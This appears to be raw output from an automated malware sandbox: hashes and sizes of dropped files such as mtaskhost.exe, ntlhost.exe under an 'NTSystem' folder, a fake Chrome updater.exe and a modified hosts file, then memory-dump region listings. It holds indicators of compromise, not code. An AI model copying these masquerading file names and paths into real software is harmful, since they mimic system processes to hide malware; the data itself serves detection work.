SHA51278df0c4c350b92743f4739855a8f605cf245463dde934edb2b8a26a5d6025231c17b8f0bbe2b9bffa4938343bf84ab88f5539282b6f9fbb78ec836d5a735d767
-
C:\Users\Admin\AppData\Local\Temp\mtaskhost.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
C:\Users\Admin\AppData\Local\Temp\mtaskhost.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD57ef0872f576a92407619106bb1764edd
SHA1356e04d7732776a0fd1115aafa2ccd06c98b1df4
SHA256753d10d802eb76960d282555d2cfed612306467a06bb95ff35f0108e425c5c02
SHA5123803c8e88177d5a86f2cf574bf50cac809420c7e4f49f1b62d2e243bf112b9b6846c61ebfc9a310dcf2c4a2ea8042e7dbc95f19dbc98a13bb39c7e8adcc4df73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6IFXHJOWP7FUAMXR89CY.tempFilesize
7KB
MD57ef0872f576a92407619106bb1764edd
SHA1356e04d7732776a0fd1115aafa2ccd06c98b1df4
SHA256753d10d802eb76960d282555d2cfed612306467a06bb95ff35f0108e425c5c02
SHA5123803c8e88177d5a86f2cf574bf50cac809420c7e4f49f1b62d2e243bf112b9b6846c61ebfc9a310dcf2c4a2ea8042e7dbc95f19dbc98a13bb39c7e8adcc4df73
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeFilesize
743.4MB
MD50b9127413603d541b9864c9627da41a7
SHA16c28f726335975a5fe7da6fba59986aa7f640db4
SHA256a0b31dadc116be18e9a624ab1a9e986594b018f1d0b31050ceb9c3ec1d28c426
SHA5124eb8cf8a9bc7bd7a40576002b025ee4c14458cd679cc2d06a117972e72c046910936b640449b800e3cb7b1a5840838b3a32364c12105ce637fce7f06008cefe6
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeFilesize
743.4MB
MD50b9127413603d541b9864c9627da41a7
SHA16c28f726335975a5fe7da6fba59986aa7f640db4
SHA256a0b31dadc116be18e9a624ab1a9e986594b018f1d0b31050ceb9c3ec1d28c426
SHA5124eb8cf8a9bc7bd7a40576002b025ee4c14458cd679cc2d06a117972e72c046910936b640449b800e3cb7b1a5840838b3a32364c12105ce637fce7f06008cefe6
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD53e9af076957c5b2f9c9ce5ec994bea05
SHA1a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
\Users\Admin\AppData\Local\Temp\cltaskhost.exeFilesize
3.4MB
MD550859caa45e9d02823ae55b69fd7b645
SHA1aec25ed88cd00fd12a18ca2714d68e33c7fd57c3
SHA2568dbebde20f5c4a1c0d29c9faf1c670423f99306042d428c35d6bdd552d3fb554
SHA51278df0c4c350b92743f4739855a8f605cf245463dde934edb2b8a26a5d6025231c17b8f0bbe2b9bffa4938343bf84ab88f5539282b6f9fbb78ec836d5a735d767
-
\Users\Admin\AppData\Local\Temp\mtaskhost.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeFilesize
743.4MB
MD50b9127413603d541b9864c9627da41a7
SHA16c28f726335975a5fe7da6fba59986aa7f640db4
SHA256a0b31dadc116be18e9a624ab1a9e986594b018f1d0b31050ceb9c3ec1d28c426
SHA5124eb8cf8a9bc7bd7a40576002b025ee4c14458cd679cc2d06a117972e72c046910936b640449b800e3cb7b1a5840838b3a32364c12105ce637fce7f06008cefe6
-
memory/292-157-0x0000000000980000-0x0000000000A00000-memory.dmpFilesize
512KB
-
memory/292-159-0x000000000098B000-0x00000000009C2000-memory.dmpFilesize
220KB
-
memory/292-158-0x0000000000980000-0x0000000000A00000-memory.dmpFilesize
512KB
-
memory/436-122-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-119-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-73-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-137-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-72-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-116-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-81-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-89-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-70-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-75-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-76-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/544-184-0x0000000140000000-0x00000001407EF000-memory.dmpFilesize
7.9MB
-
memory/544-181-0x00000000001D0000-0x00000000001F0000-memory.dmpFilesize
128KB
-
memory/544-177-0x0000000140000000-0x00000001407EF000-memory.dmpFilesize
7.9MB
-
memory/544-186-0x00000000001D0000-0x00000000001F0000-memory.dmpFilesize
128KB
-
memory/544-180-0x0000000140000000-0x00000001407EF000-memory.dmpFilesize
7.9MB
-
memory/544-174-0x00000000000B0000-0x00000000000D0000-memory.dmpFilesize
128KB
-
memory/1052-146-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-148-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-147-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-167-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-145-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-144-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-143-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-142-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-150-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-154-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-161-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1344-56-0x000000001B440000-0x000000001B4B2000-memory.dmpFilesize
456KB
-
memory/1344-54-0x0000000000040000-0x00000000001F6000-memory.dmpFilesize
1.7MB
-
memory/1344-55-0x000000001AF80000-0x000000001B000000-memory.dmpFilesize
512KB
-
memory/1480-132-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-133-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-129-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-130-0x000000001B0C0000-0x000000001B3A2000-memory.dmpFilesize
2.9MB
-
memory/1480-131-0x0000000002330000-0x0000000002338000-memory.dmpFilesize
32KB
-
memory/1480-128-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1524-183-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1524-176-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1532-151-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1532-141-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1644-82-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-83-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-86-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-91-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-85-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-84-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-96-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-87-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-88-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1740-110-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1740-112-0x0000000002420000-0x0000000002428000-memory.dmpFilesize
32KB
-
memory/1740-111-0x000000001B170000-0x000000001B452000-memory.dmpFilesize
2.9MB
-
memory/1740-114-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1740-113-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1984-61-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1984-62-0x00000000003B0000-0x00000000003B6000-memory.dmpFilesize
24KB
-
memory/1984-63-0x0000000004900000-0x0000000004940000-memory.dmpFilesize
256KB
-
memory/1984-64-0x0000000004900000-0x0000000004940000-memory.dmpFilesize
256KB
-
memory/1984-71-0x0000000008920000-0x000000000971B000-memory.dmpFilesize
14.0MB
-
memory/1984-57-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1984-59-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1996-104-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-121-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-160-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-115-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-162-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-97-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-166-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-98-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-117-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-152-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-99-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-101-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-175-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-149-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-102-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-178-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-103-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-118-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-182-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-105-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-134-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/2024-168-0x0000000000ED0000-0x0000000000F50000-memory.dmpFilesize
512KB